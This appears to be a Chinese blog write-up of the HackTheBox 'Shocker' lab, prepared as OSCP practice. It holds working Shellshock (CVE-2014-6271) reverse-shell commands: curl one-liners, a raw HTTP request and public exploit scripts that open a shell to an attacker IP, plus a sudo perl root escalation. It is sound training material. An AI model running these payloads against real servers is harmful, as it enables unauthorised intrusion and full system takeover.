OSCP系列-lab-Shocker

最新推荐文章于 2024-04-09 20:30:00 发布
最新推荐文章于 2024-04-09 20:30:00 发布
阅读量209 收藏
点赞数
分类专栏: HackTheBox-CTF 文章标签: 服务器 ssh 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EdSu12138/article/details/130185334
版权

OSCP系列-lab-Shocker

文章目录


环境:
内网 : kali 10.10.16.3
内网: 靶机 10.10.10.56

1.信息收集

nmap -n -v -sS -p- 10.10.10.56 --max-retries=0 -oN scan.txt -Pn

扫描开放端口

nmap -n -v -sC -sV -p 80,2222 10.10.10.56 -oN Shocker.txt -Pn

只有80 和 2222
在这里插入图片描述

80是个web服务
在这里插入图片描述

2222是ssh
先扫描下目录看看

dirsearch -u "http://10.10.10.56" -e*

一堆403 只有个cgi-bin目录 看起来有点用
在这里插入图片描述

wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.10.10.56/cgi-bin/FUZZ.sh

'''
wfuzz:fuzzing 工具,用于测试 Web 应用程序中的参数。
-c:将所有输出颜色化以便更容易区分。
-z file:指定字典文件,用于构建攻击载荷。在这里,使用 /usr/share/wfuzz/wordlist/general/common.txt 作为字典文件。
--hc 404:忽略 HTTP 响应码为 404 的请求。这个选项可用于减少噪音和提高效率。
http://10.10.10.56/cgi-bin/FUZZ.sh:指定 fuzzing 的 URL 地址。其中 FUZZ 是用于 fuzzing 的关键字,它将在字典中查找并替换它。
总之,这个命令使用字典文件中的常用单词来 fuzzing http://10.10.10.56/cgi-bin/FUZZ.sh 这个 URL 地址,同时忽略 HTTP 响应码为 404 的请求。
'''

简单来说就是这个目录我无法直接访问 但是可以试试直接去访问他这目录下的文件 然后枚举文件名 这么个操作
wfuzz参考链接:
https://blog.csdn.net/JBlock/article/details/88619117
发现一个user.sh 下载下来看看

 wget http://10.10.10.56/cgi-bin/user.sh

在这里插入图片描述
通过该脚本 判断可能存在 CVE-2014-6271 shellshock漏洞
漏洞解释:
https://www.cnblogs.com/Cl0ud/p/14248937.html
https://www.cvedetails.com/cve/CVE-2014-6271/

利用nmap扫描确认下:

nmap -sV -p 80 --script=http-shellshock.nse --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56

在这里插入图片描述
确认存在该漏洞

利用方式:
下面方式都可以正常利用,在user-agent头也可以

curl -H 'Cookie: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.16.3/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -H 'Cookie: () { :;}; echo; /bin/sh -i >& /dev/tcp/10.10.16.3/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -H 'Cookie: () { :;}; /bin/sh -i >& /dev/tcp/10.10.16.3/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -H 'Cookie: () { :;};  /bin/bash -i >& /dev/tcp/10.10.16.3/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -A '() { :; }; /bin/bash -i > /dev/tcp/10.10.16.3/8833 0<&1 2>&1' http://10.10.10.56/cgi-bin/user.sh
上面执行的时候需要本地监听端口


通过burpsuite提交请求也可以
GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
User-Agent: () { :;};  /bin/bash -i >& /dev/tcp/10.10.16.3/8833 0>&1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close

上面执行的时候需要本地监听端口

直接通过exploit拿shell
https://www.exploit-db.com/exploits/34900
python 34900.py  payload=reverse rhost=10.10.10.56 lhost=10.10.16.3lport=9966 pages=/cgi-bin/user.sh

第二种自定义的exploit
https://github.com/nullarmor/hackthebox-exploits/blob/master/shocker/exploit.py
python nullarmor-exploit.py --rhost 10.10.10.56 --lhost 10.10.16.3--lport 8899

第三种自定义的exploit
https://github.com/nccgroup/shocker
python shocker.py -H 10.10.10.56 --command "/bin/bash -i > /dev/tcp/10.10.16.3/8833 0<&1 2>&1" -c /cgi-bin/user.sh
上面执行的时候需要本地监听端口

其实对于这个漏洞最开始 完全不知道 属于做了这个靶机才知道这个漏洞
-_-
具体理解还是需要多看看解析
在这里插入图片描述
成功getshell
在这里插入图片描述
然后提权 先看看能够提权的方式
sudo 或者 找个exp
sudo -l 看下
可以以root权限来执行perl,通过perl执行任何命令. perl是一门编程语言
利用这个语言启动bash 因为这个语言 又是有sudo权限 所以就可以提权

在这里插入图片描述

sudo prel -e "exec '/bin/bash'"
# 可以理解成 php -m "<?php system('ls');?>" 类似这样的操作

提权获取到flag

在这里插入图片描述

EdSu
关注
专栏目录
OSCP-Challenge 1 - Medtech
羽的博客
03-14 3980
122靶机进入/home/mario/.ssh目录下,发现存在id_rsa,用这个逐个登录内网靶机,发现14的成功进入。现在我们通过代理可以扫描内网的其他机器了,扫了下10-14、83、83开放的端口基本差不多,发现都有5985。如果可以看到的话,那就简单了,直接覆盖成shell文件就可以了,然后等待反弹。登录后发现限制了命令的执行,但是help了一下,发现了哪些可以用的命令。咨询了一下是dns的问题,修改dns的ip位域的ip,也就是10的ip。接着上mimikatz来获取一些明文信息,但是失败了。
【oscp-labs】10.11.1.5
qq_43156413的博客
12-20 315
【oscp-labs】10.11.1.5
OSCP系列-lab-Lame
EdSu12138的博客
04-14 232
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AQYJ6WZb-1681460248821)(C:\Users\cc\AppData\Roaming\Typora\typora-user-images\image-20230414155224158.png)]这个版本的 Samba 在进行身份认证之前 会对 username 做映射 会解析你的 username 也就是说如果username是个命令 就可以解析执行 漏洞编号。第二个hash在home下的makis目录下。
【oscp系列-Tr0ll-1】靶机4
weixin_44807430的博客
01-16 558
知行合一
OSCP系列靶场-Esay-Monitoring保姆级
杳若的博客
09-20 216
OSCP系列靶场-Esay-Monitoring
OSCP系列-lab-Brainfuck
EdSu12138的博客
04-15 328
提权原理与 Docker 提权非常相似,本质都是利用用户创建一个容器,在容器中挂载宿主机的磁盘后使用容器的权限操作宿主机磁盘修改敏感文件,比如/etc/passwd、/root/.ssh/authorized_keys、/etc/sudoers等,从而完成提权。使用f-string把pt中的值转换为十六进制字符串,再通过bytes.fromhex()把十六进制字符串转换为字符串,其中decode()方法的默认编码为UTF-8,因此生成的字符串以UTF-8编码。(讲道理我都没听过这个脚本)
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
OSCP - 6Days_Lab-v1.0.1靶机
小小猪的博客
06-09 396
OSCP - 6Days_Lab-v1.0.1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.232 访问 http://x.x.x.232 输入折扣码,提示代码过期,没啥用处 查看页面源码 访问,得到出错,可能存在ssrf 修改src=后边参数为index.php,并没有拦截,也没有报错 使用dirb http://x.x.x.232,获取靶机网站目录结构文件 打开BP进行抓包,发现响应包是主页界面,访.
OSCP证书考试总结与终身学习 - 带你走上 OSCE3
0pr
08-25 1万+
终于有点时间写些东西了。这半年来一直在准备 Offensive Security 的各种考试,内容太多。直到昨天,也就是8月24日,我完成了第二轮 OSEP 的 Lab,心里踏实多了,等着9月4日考试的同时,也想做个小结,谈谈我拿 OSCP 的历程以及今后的目标。希望可以为想考取 OSCP 的同学指明一些道路。
OSCP 2021攻略之旅--从小白到通过
ShadowBlade
08-08 2万+
发布此文章,能够让更多想学习通过OSCP的同学得到更好的指导。
OSCP备考分享
最新发布
xnxqwzy的博客
04-09 2043
​ 先说说个人的情况。​首先,我并不能算作严格意义上安全科班出身,属于半路出家做安全。一直以来都是从事甲方安全防护,偏重基于业务侧的应用安全、数据保护、隐私合规。渗透测试于我几乎是盲区一样的存在,仅对web、android的安全测试有些许了解,比如漏洞原理、防护、测试等,利用层面都很少接触。​起初是从之前的同事那里了解到CEH,一个偏重攻击实操的认证,但是考试需要去香港,觉得比较麻烦就放弃了。之后一段时间也没计划学习渗透的知识,随着工作越来越久,逐渐体会到”不知攻,焉知防“的意思。
OSCP 2023 challenge Writeup-Medtech
fuckskyboy的博客
08-26 8627
OSCP lab writeup
认识OSCP与国外INE机构OSCP课程(价值999美元)已翻译版分享
Summer's blog
05-13 1万+
Offensive Security Certified Professional (OSCP) Most recognized penetration testing certification in the industry Earn after passing the 24-hour performance based exam Pre-requisite Course: Penetr...
oscp认证考试指南
热门推荐
qq_34304107的博客
02-18 2万+
目录简介第一节: 考试要求文档要求Exploit 代码考试证据控制面板提交截图要求考试限制Metasploit 限制第二节:考试信息考试网络连接考试控制板靶机快照恢复考试中proof文件分值分配取消得分建议使用的报告模板奖励积分网络连接问题联系方式提交说明提交格式和名称压缩文件提交上传收到确认书其他必要信息结果常见问题 简介 这份指南以解释oscp认证考试为目的。第一部分描述考试前需要准备的工具等...
OSCP历程
Shadow的博客
12-08 1600
今天1点40,我收到了offensive发的邮件,通知我通过了oscp考试!现在总结下吧。 1、笔记很重要,教材一定要看,很多细节都在教材里面,遇到新知识一定要记笔记,每做一台靶机,之后一定要写报告,把你渗透的过程,思路,记录下来。因为当时你觉得可能记住了,但是做了几十台到考试前时候你发现什么都记不住,这时候就需要过一遍你的靶机writeup来回忆相关知识点。 2、官方靶机如果遇到不会的,没头绪的,可以上论坛,看看别人是怎么说的。如果一台靶机做了一天还是一点进展都没有,那就下一台吧,可能...
OSCP考试回顾
weixin_30815469的博客
05-15 2491
技术背景 从2011年开始接触学习渗透测试,全职做过的职位有渗透测试,Python后端研发,DevOps,甲方安全打杂. 学习过程 首先考试报名,交钱。买了价值800美元的一个月lab,包含Pentest with Kali的视频教程和一个PDF还有一次考试费用。视频教程和PDF介绍了一些常见工具,没有其他。 3月报名,买了一个月LabLab环境需要预约,最早能预约到报名时间2周后的。 关于OS...
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值